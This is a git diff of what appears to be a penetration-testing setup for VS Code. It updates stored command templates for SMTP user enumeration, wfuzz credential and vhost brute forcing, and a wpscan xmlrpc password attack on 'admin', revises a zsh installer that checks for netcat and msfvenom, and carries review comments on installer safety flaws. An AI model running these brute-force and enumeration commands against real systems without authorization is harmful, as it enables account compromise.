a/completion_indexer/smtp-user-enum +++ b/completion_indexer/smtp-user-enum 
@@ -1,3 +1,3 @@ -smtp-user-enum -M EXPN -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" -smtp-user-enum -M RCPT -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" -smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" +smtp-user-enum -M EXPN -U ${SECLIST}/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" +smtp-user-enum -M RCPT -U ${SECLIST}/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" +smtp-user-enum -M VRFY -U ${SECLIST}/Usernames/top-usernames-shortlist.txt -t "$TARGET" "$PORT" diff --git a/completion_indexer/wfuzz b/completion_indexer/wfuzz index 7afd75f..5ff9d57 100644 --- a/completion_indexer/wfuzz +++ b/completion_indexer/wfuzz @@ -1,5 +1,5 @@ -wfuzz --hc 401 -c -v -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/darkweb2017-top100.txt --basic "FUZZ:FUZ2Z" -u "http://$TARGET/secretpage" -wfuzz --hc 403,404 -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt -u "http://$TARGET/FUZZFUZ2Z" +wfuzz --hc 401 -c -v -w ${SECLIST}/Usernames/top-usernames-shortlist.txt -w ${SECLIST}/Passwords/darkweb2017-top100.txt --basic "FUZZ:FUZ2Z" -u "http://$TARGET/secretpage" +wfuzz --hc 403,404 -c -w ${SECLIST}/Discovery/Web-Content/big.txt -w ${SECLIST}/Discovery/Web-Content/web-extensions.txt -u "http://$TARGET/FUZZFUZ2Z" wfuzz --hh 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.machine.org' -u "http://$TARGET/" wfuzz --hh 185 -c -w `fzf-wordlists` -H 'Host: FUZZ.org' -u "http://$TARGET/" wfuzz -c --hw 157 -L -w `fzf-wordlists` -w `fzf-wordlists` -X POST -d 'username=FUZZ&password=FUZ2Z' -u "http://$TARGET/admin" diff --git a/completion_indexer/wpscan b/completion_indexer/wpscan index 1740fec..686bee5 100644 --- a/completion_indexer/wpscan +++ b/completion_indexer/wpscan 
@@ -1,3 +1,6 @@ wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --enumerate u1-20 wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-detection aggressive -wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt +wpscan --api-token APITOKEN --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P ${SECLIST}/Passwords/darkweb2017-top1000.txt +wpscan --url "http://$TARGET/" --no-banner --enumerate u1-20 +wpscan --url "http://$TARGET/" --no-banner --plugins-detection aggressive +wpscan --url "http://$TARGET/" --no-banner --plugins-version-detection passive --password-attack xmlrpc -U 'admin' -P ${SECLIST}/Passwords/darkweb2017-top1000.txt diff --git a/craft.py b/craft.py index 867c99e..d080153 100755 --- a/craft.py +++ b/craft.py @@ -22,6 +22,8 @@ def create_value_map(filepath:str): variable_file_content_map = {} files = os.listdir(filepath) for file in files: + if file in [".command_history"]: + continue curr_file = os.path.join(filepath, file) if os.path.isfile(curr_file): variable_file_content_map[curr_file] = read_file_return_base64ed_content(curr_file) diff --git a/installer.sh b/installer.sh index 4d5290a..5ddaf1b 100755 --- a/installer.sh +++ b/installer.sh 
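Review bot: The skip added in `create_value_map` has no comment explaining why `.command_history` is excluded, and the name is buried in an inline one-element list. The function base64-encodes every file it finds into the map, which appears to end up in the generated install script, so this check is what keeps the operator's local command history (already listed in `.gitignore`) out of a distributable artifact. Say so on the line, e.g. `# local shell history may contain credentials; never embed it in the generated script`. A module-level `EXCLUDED_FILES = (".command_history",)` tested with `if file in EXCLUDED_FILES:` would make it obvious where to add further local-only files. The `def` line and the rest of the function body are outside this hunk.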
@@ -1,22 +1,118 @@ #!/bin/zsh -if [[ -d ~/.local/weapon ]]; then - echo "Weapon already installed." - exit 0 -fi - -export LOCATION=~/.local/weapon -echo "Installing Weapon..." -mkdir -p $LOCATION && echo "Weapon directory created at $LOCATION." -cp -f ./createhackenv.sh $LOCATION && echo "createhackenv.sh copied to $LOCATION." -cp -f ./zsh_history $LOCATION && echo "zsh_history copied to $LOCATION." - -grep -zq "source $LOCATION/createhackenv.sh" ~/.zshrc -if [[ $? -eq 0 ]]; then - echo "createhackenv.sh already sourced in ~/.zshrc. sktpping..." -else - echo "Sourcing createhackenv.sh in ~/.zshrc..." - echo "source $LOCATION/createhackenv.sh" >> ~/.zshrc -fi - -echo "Weaponized VSCode installation completed." \ No newline at end of file +function check_command() { + command -v "$1" >/dev/null 2>&1 || { + echo "detect $1 is not installed." + echo "$2" + return 2 + } +} + +function check_requirements() { + check_command "awk" "awk is required for parsing the output of commands, please install it." || return 2 + check_command "sed" "sed is required for parsing the output of commands, please install it." || return 2 + check_command "grep" "grep is required for parsing the output of commands, please install it." || return 2 + check_command "tr" "tr is required for parsing the output of commands, please install it." || return 2 + check_command "zsh" "zsh is core to WeaponizedVSCode integrated shell." || return 2 + check_command "vim" "vim is required for task edit /etc/hosts, please install it or change it." || return 2 + check_command "nc" "nc is core for netcat shell session handling or u can't use it, please install it." || return 2 + check_command "rlwrap" "rlwrap is required for netcat shell session handling, please install it" || return 2 + check_command "msfvenom" "You will not have meterpreter shell or msfconsole feature in vscode integrated terminal." 
|| return 2 + check_command "code" "Visual Studio Code is required for WeaponizedVSCode, please for sure your 'code' command is available in PATH." || return 2 + check_command "yq" "yq is required for parsing YAML content to environment variable, install it with 'brew install yq' or 'apt install yq'." || return 2 + check_command "simplehttpserver" "simplehttpserver is cool for serving files with upload feature and dump http requests, install it with https://github.com/projectdiscovery/simplehttpserver" || return 2 + check_command "rustscan" "rustscan is required for the auto scanning task in vscode, fast and reliable, install it with https://github.com/bee-san/RustScan" || return 2 + check_command "wfuzz" "wfuzz is required for command wfuzz_vhost_https and wfuzz_vhost_http, to fuzz the subdomain and vhost. install it or u can't use that" || return 2 + check_command "hashcat" "hashcat is required for the hashcat cracking task in vscode, install it with 'apt install hashcat' or 'brew install hashcat'." || return 2 + check_command "python3" "Python3 is required for the Python scripts in WeaponizedVSCode, please install it." || return 2 + check_command "uv" "uv is optional but recommended for better performance, install it with 'pip install uv'. Their script is useful" +} + +export INSTALL_IDENTIFIER="WeaponizedVSCode installation script. The following commands are generated by WeaponizedVSCode installer." + +function args() { + while [[ "$#" -gt 0 ]]; do + case "$1" in + (--trace-mode) + export WEAPON_TRACE_MODE=true + shift + ;; + (--force-install) + export WEAPON_FORCE_INSTALL=true + shift + ;; + *) + echo "Unknown option: $1" + exit 1 + ;; + esac + done +} + +function main() { + check_requirements + if [[ $? -ne 0 && "$FORCE_INSTALL" != "true" ]]; then + echo "Please install the required commands to continue." 
+ echo "If you want to force install without checking requirements, run the script with FORCE_INSTALL=true ./installer.sh" + exit 1 + fi + + if [[ -z "$WEAPON_LOCATION" ]]; then + echo "WEAPON_LOCATION is not set. set to default ~/.local/weapon" + export WEAPON_LOCATION=~/.local/weapon + echo "You can set it by exporting WEAPON_LOCATION=your_desired_path before running this script." + fi + + if [[ -d "$WEAPON_LOCATION" ]]; then + echo "Weapon already installed." + if [[ "$WEAPON_FORCE_INSTALL" == "true" ]]; then + echo "Force install mode enabled, removing existing Weapon directory at $WEAPON_LOCATION." + rm -rf "$WEAPON_LOCATION" + else + echo "If you want to reinstall Weapon, please remove the existing directory at $WEAPON_LOCATION or use --force-install option." + exit 0 + fi + fi + + export LOCATION="$WEAPON_LOCATION" + echo "Weapon will be installed to $LOCATION, Press Enter key to continue or Ctrl+C to cancel..." + read + echo "Installing Weapon..." + mkdir -p $LOCATION && echo "Weapon directory created at $LOCATION." + cat ./createhackenv.sh |sed -e "s#__REPLACE__#$LOCATION#g" > $LOCATION/createhackenv.sh && echo "createhackenv.sh copied to $LOCATION." + cp -f ./zsh_history $LOCATION && echo "zsh_history copied to $LOCATION." + + if [[ "$WEAPON_TRACE_MODE" == "true" ]];then + cp -f ./zsh_preformance_tracer.sh $LOCATION && echo "zsh_performance_tracer is copied to $LOCATION." + fi + + grep -zq "${INSTALL_IDENTIFIER}" ~/.zshrc + if [[ $? -eq 0 ]]; then + echo "createhackenv.sh already sourced in ~/.zshrc. sktpping..." + else + echo "Sourcing createhackenv.sh in ~/.zshrc..." 
+ cp ~/.zshrc ~/.zshrc.pre-weaponized-vscode && echo "Backup ~/.zshrc to ~/.zshrc.pre-weaponized-vscode" + + if [[ "$WEAPON_TRACE_MODE" == "true" ]]; then +cat<> ~/.zshrc + +# ${INSTALL_IDENTIFIER} +[[ -f $LOCATION/zsh_preformance_tracer.sh ]] && source $LOCATION/zsh_preformance_tracer.sh && zsh_trace_start +[[ -f $LOCATION/createhackenv.sh ]] && source $LOCATION/createhackenv.sh +[[ -f $LOCATION/zsh_preformance_tracer.sh ]] && zsh_trace_end +EOF + else +cat<> ~/.zshrc + +# ${INSTALL_IDENTIFIER} +[[ -f $LOCATION/createhackenv.sh ]] && source $LOCATION/createhackenv.sh +EOF + fi + + fi + + echo "Weaponized VSCode installation completed." +} + +args "$@" +main diff --git a/launch_helper.zsh b/launch_helper.zsh index b155480..d349364 100755 --- a/launch_helper.zsh +++ b/launch_helper.zsh @@ -1,6 +1,8 @@ +export WEAPON_LOCATION=__REPLACE__ + weapon_vscode_launch_helper () { - if [ -f ~/.local/weapon/zsh_history ]; then - export HIST_COMMAND_INDEXER=~/.local/weapon/zsh_history + if [ -f ${WEAPON_LOCATION}/zsh_history ]; then + export HIST_COMMAND_INDEXER=${WEAPON_LOCATION}/zsh_history fi if [ -n "$PROJECT_FOLDER" ]; then if [ -f "$PROJECT_FOLDER/.vscode/.zshrc" ]; then diff --git a/releaser.py b/releaser.py index a94303c..bf2cd76 100755 --- a/releaser.py +++ b/releaser.py @@ -17,9 +17,10 @@ ## How to use it? 1. Download the script -2. source it -3. use function `createhack ` with the name of the file you want to open -4. vscode will Automatically open the folder +2. unzip the zip file +3. run ./installer.sh to install the weapon in to your ~/.local/weapon folder +4. use function `createhack ` with the name of the file you want to open +5. vscode will Automatically open the folder ## Script Hash diff --git a/zsh_preformance_tracer.sh b/zsh_preformance_tracer.sh new file mode 100644 index 0000000..08f5530 --- /dev/null +++ b/zsh_preformance_tracer.sh 
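Review bot: In `main`, `rm -rf "$WEAPON_LOCATION"` runs before the "Press Enter key to continue or Ctrl+C to cancel" prompt, and the path comes straight from the environment, so `--force-install` with `WEAPON_LOCATION` pointing at an existing directory such as `$HOME` deletes it before the user can cancel. I would move the `read` confirmation above the existence check, refuse `/` and `$HOME`, and write the removal as `rm -rf -- "${WEAPON_LOCATION:?}"`. Separately, `check_command "uv" ...` is the last statement of `check_requirements` and has no `|| return 2`, so its status 2 becomes the function's return value and a missing `uv` stops the install even though the message calls it optional; ending that line with `|| true` keeps it advisory. The bypass in `main` also tests `$FORCE_INSTALL` while `args` exports `WEAPON_FORCE_INSTALL`, so `--force-install` does not skip the requirements check; if that split is intended it deserves a comment.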
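Review bot: `export WEAPON_LOCATION=__REPLACE__` is filled in by a plain `sed` text substitution in installer.sh (applied to `createhackenv.sh`, which presumably embeds this file), so the install path ends up as unquoted shell source that is read on every shell start. A path containing a space or a shell metacharacter would then be parsed as extra words or commands rather than as a value. Writing `export WEAPON_LOCATION="__REPLACE__"` and having the installer reject paths that contain quotes, `$`, backticks or the `#` used as the sed delimiter closes that. The line also overwrites any `WEAPON_LOCATION` the user already exported, and `[ -f ${WEAPON_LOCATION}/zsh_history ]` would read better quoted like the `"$PROJECT_FOLDER"` tests below it. The body of `weapon_vscode_launch_helper` continues past the end of the hunk.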
@@ -0,0 +1,30 @@
+export WEAPON_TRACE_LOG=/tmp/weapon_trace_log.$$
+
+zsh_trace_start() {
+ echo "starting zsh tracing"
+ # set the trace prompt to include seconds, nanoseconds, script name and line number
+ # This is GNU date syntax; by default Macs ship with the BSD date program, which isn't compatible
+ if [[ $ZSH_VERSION > 4.3.11 ]]; then
+ zmodload zsh/datetime
+ setopt promptsubst
+ export PS4='+$EPOCHREALTIME %N:%i> '
+ else
+ export PS4='+$(date "+%s:%N") %N:%i> '
+ fi
+ # save file stderr to file descriptor 3 and redirect stderr (including trace
+ # output) to a file with the script's PID as an extension
+ exec 3>&2 2>$WEAPON_TRACE_LOG
+ # set options to turn on tracing and expansion of commands contained in the prompt
+ setopt xtrace prompt_subst
+ trap 'setopt xtrace' EXIT
+}
+
+zsh_trace_end() {
+ # turn off tracing
+ unsetopt xtrace
+ # restore stderr to the value saved in FD 3
+ exec 2>&3 3>&-
+ echo "zsh tracing done. See $WEAPON_TRACE_LOG for details."
+ trap 'unsetopt xtrace' EXIT
+}
+
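Review bot: `WEAPON_TRACE_LOG=/tmp/weapon_trace_log.$$` is a predictable name in a shared directory, and `exec 3>&2 2>$WEAPON_TRACE_LOG` in `zsh_trace_start` then writes a full xtrace of the shell start-up into it. The trace holds every expanded command and variable value, which is presumably sensitive for a tool that loads target credentials into the environment, and the redirect creates the file under the default umask and follows a symlink already placed at that path. I would create it with `WEAPON_TRACE_LOG=$(mktemp "${TMPDIR:-/tmp}/weapon_trace_log.XXXXXX")` so the file is new and readable only by its owner. `[[ $ZSH_VERSION > 4.3.11 ]]` is also a string comparison, so for example `10.0` sorts below `4.3.11`; zsh's `is-at-least` (after `autoload -Uz is-at-least`) compares versions numerically.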